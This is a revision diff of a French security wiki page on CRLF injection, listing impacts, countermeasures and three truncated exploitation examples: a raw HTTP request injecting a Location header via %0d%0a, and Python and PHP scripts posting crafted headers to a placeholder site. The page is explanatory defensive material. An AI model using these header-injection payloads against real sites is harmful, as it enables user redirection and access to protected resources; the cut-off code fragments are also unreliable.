cyber:vulnerabilite:crlf
Différences
Ci-dessous, les différences entre deux révisions de la page.
| Les deux révisions précédentesRévision précédenteProchaine révision | Révision précédente | ||
| cyber:vulnerabilite:crlf [2025/07/03 11:57] – admin | cyber:vulnerabilite:crlf [2025/07/03 12:03] (Version actuelle) – [Exemple 3] admin | ||
|---|---|---|---|
| Ligne 35: | Ligne 35: | ||
| Une exploitation réussie de ce type de vulnérabilité peut permettre : | Une exploitation réussie de ce type de vulnérabilité peut permettre : | ||
| - | -* L' | + | |
| - | -* La redirection des utilisateurs sur des sites externes ; | + | * La redirection des utilisateurs sur des sites externes ; |
| - | -* L' | + | * L' |
| - | -* L’accès à des fonctionnalités sensibles. | + | * L’accès à des fonctionnalités sensibles. |
| + | |||
| + | ===== Contres-mesures ===== | ||
| - | {{{Contres-mesures}}} | ||
| Les contre-mesures suivantes peuvent être mises en œuvre : | Les contre-mesures suivantes peuvent être mises en œuvre : | ||
| - | -* Filtrer les caractères CR et LF dans les entrées de données ; | + | |
| - | -* S' | + | * S' |
| + | |||
| + | ====== Comment cela fonctionne? | ||
| + | |||
| + | Les scénarii suivants peuvent être joués via l' | ||
| + | * Redirection des visiteurs d'une application ; | ||
| + | * Accès à des ressources protégées. | ||
| + | |||
| + | ===== Exemple 1 ===== | ||
| + | |||
| + | Voici un exemple d' | ||
| + | |||
| + | <code http> | ||
| + | GET / HTTP/1.1 | ||
| + | Host: vulnerable-site.com | ||
| + | |||
| + | %0d%0aLocation: | ||
| + | </ | ||
| + | |||
| + | Dans cet exemple, les caractères < | ||
| + | |||
| + | ===== Exemple 2 ===== | ||
| + | |||
| + | Exploitation de la vulnérabilité CRLF en Python : | ||
| + | |||
| + | <code python> | ||
| + | import requests | ||
| + | |||
| + | url = " | ||
| + | |||
| + | headers = { | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | } | ||
| + | |||
| + | data = " | ||
| + | |||
| + | response = requests.post(url, | ||
| + | </ | ||
| + | |||
| + | Dans cet exemple, nous envoyons une requête POST à l'URL http:// | ||
| + | |||
| + | ===== Exemple 3 ===== | ||
| + | |||
| + | Exploitation de la vulnérabilité CRLF en PHP : | ||
| + | |||
| + | <code php> | ||
| + | <?php | ||
| + | |||
| + | $url = " | ||
| + | |||
| + | $headers = array( | ||
| + | "Host: vulnerable-site.com", | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | ); | ||
| + | |||
| + | $data = " | ||
| + | |||
| + | $options = array( | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | " | ||
| + | ), | ||
| + | ); | ||
| + | |||
| + | $context | ||
| + | $result = file_get_contents($url, | ||
| + | </ | ||
| + | |||
| + | Dans cet exemple, nous envoyons une requête POST à l'URL http:// | ||
| + | ====== References ====== | ||
| + | URL : | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| + | * https:// | ||
| ====== Retour fiches vulnérabilités ====== | ====== Retour fiches vulnérabilités ====== | ||
| * [[cyber: | * [[cyber: | ||
cyber/vulnerabilite/crlf.1751536654.txt.gz · Dernière modification : 2025/07/03 11:57 de admin
